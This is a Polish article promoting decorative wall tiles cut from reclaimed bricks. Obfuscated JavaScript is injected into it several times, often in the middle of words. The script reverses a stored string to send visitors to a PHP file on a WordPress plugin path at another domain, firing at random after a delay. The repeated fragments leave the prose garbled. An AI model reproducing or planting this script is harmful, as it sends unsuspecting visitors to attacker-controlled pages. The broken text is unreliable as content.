Estetyczne płytki cięte z cegieł

Ozdoby z płytek przypominających mur z cegły, lub też jego fragment, są bardzo popularnym sposobem na wykończenie przestrzeni w mieszkaniu, kuchni czy nawet lokalu. Zazwyczaj stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosuje się płytki odlewane z gipsu, które są bardzo tanie, aczkolwiek nietrwałe, i dość przeciętne wizualnie. Częściej tą rolę spełniają płytki odlewane z tworzyw sztucznych.

Ozdobne płytki tworzone z cegły porozbiórkowej

cięta cegłaMiłośnicy nietypowego wystroju preferują jednak płytki wycinane z porozbiórkowych, starych cegieł, gdyż takowe wyglądają najlepiej, mają bardzo satysfakcjonującą trwałość, a mimo wyższej ceny niż pozostałe ozdoby tego rodzaju, nadal są bardzo przystępne cenowo. $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory.eu/”>Cięta cegła może być sprzedawana jako gotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towe płytki do samodzielnego położenia na dowolnej powierzchni, lub jako już połączony kawałek, zazwyczaj będący ozdobą do założenia na ścianie. Pierwsza wersja jest zdecydowanie bardziej rozpowszechniona, gdyż większość nabywców używa płytek z cegieł dokładnie w taki sam sposób jak kafelków do kuchni, i nakłada je na ściany tak, by tworzyły fragment, lub nawet całą ścianę, przypominającą mur z ceglanych płytek. Wymagają one co prawda zabezpieczenia preparatem minimalizującym niszczenie cegieł, aczkolwiek należą do bardzo trwałych i rzadko ulegają uszkodzeniom czy naturalnemu rozpadowi. Wygląd płytek różni się w zależności od rodzaju cegieł zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowanych do ich stworzenia.

Najbardziej poszukiwane są oczywiście klasyczne, czerwone cegły, zwłaszcza takie które posiadają skazy i ubytki, powstałe z czasem, aczkolwiek co bardziej niestandardowe cegły również przerabiane są na płytki i używane do wykańczania wnętrz z bardzo imponującym efektem. Wiele firm skupuje cegły po rozbiórce domów i przerabia je na płytki ozdobne do wykańczania pomieszczeń.